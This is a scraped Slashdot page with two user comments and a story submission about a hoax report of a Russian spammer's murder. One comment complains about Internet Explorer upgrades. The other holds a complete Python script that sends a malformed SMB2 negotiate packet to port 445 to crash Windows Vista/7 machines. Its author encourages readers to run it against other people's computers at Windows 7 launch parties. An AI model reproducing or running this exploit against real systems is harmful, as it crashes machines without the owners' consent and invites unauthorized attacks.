Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror

Comment: upgrading explorer (Score 1) 229

by omar_armas (#35165368) Attached to: Microsoft Releases Internet Explorer 9 RC
Upgrading Microsoft Internet Explorer is a pain. IE6, 7 and 8 are completely different products.
Why I could never upgrading a complete operating system convert my IE6 to IE7 or 8? You had to install them independently.
That only speaks of a poor strategy and product, a complete shame.

Oh, and at work we have providers who developed extranets using Microsoft technologies that worked in IE 7, but then came IE8 and they are incompatible. Microsoft is incompatible with themselves.

I only lament that because of my work I have to support the Explorer navigator, the worst experience.

Omar

Comment: testing windows 7 (Score 1) 830

by omar_armas (#29578729) Attached to: Mainstream Press "Cringes" At Win7 Launch Parties
If I buy, let's say, a t-shirt, I expect it to be defects free, otherwise, I'd not buy it or would have it changed.
So, is Windows 7 defect free?

Let's see, just try this script in the party to check if Windows 7 is a good new product, the parameter is the ip of the happy windows 7:
(adapted from http://seclists.org/fulldisclosure/2009/Sep/0039.html )

------begin---------
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
import socket
import sys

ip = sys.argv[1]
host = ip, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"

)

sock = socket.socket()
sock.connect(host)
sock.send(buff)
print sock.recv(8192)
sock.close()
</pre>

If the script works, vista dies and it means Microsoft has again released a brand new product with an important bug.
Please, it's time to ask Microsoft to release secure products. Believe it or not, I plan to use Windows 7 at some point and want it to be a good O.S.

Omar

PS. The script was tested on MacOS 10.6, but should work on Linux too.
Security

+ - Viagra Spammer muder a hoax?->

Submitted by
inkslinger77
inkslinger77 writes "This is a pretty interesting example of how and why rumors spread on the internet: Blogger Alex Loonov wrote yesterday (http://loonov.com/russian-viagra-and-penis-enlargement-spammer-murdered.htm#) about 'Tolstokozhev's' murder after apparently seeing it on Russian television. He wrote that a Russian spammer named Alexey Tolstokozhev (whose name in Russian apparently means 'Thick Skin') was found murdered in his luxury house near Moscow..." The 'news' spread, leading security professionals to comment on it and how it is most likely a hoax. They speculate in this article on the motives for such a hoax: it could be to increase traffic to the blogger's site, or to scare away spammers. A Russian malware expert even suggests possible motives in the "unlikely" possibility that the post is legitimate."
Link to Original Source

You're already carrying the sphere!

Working...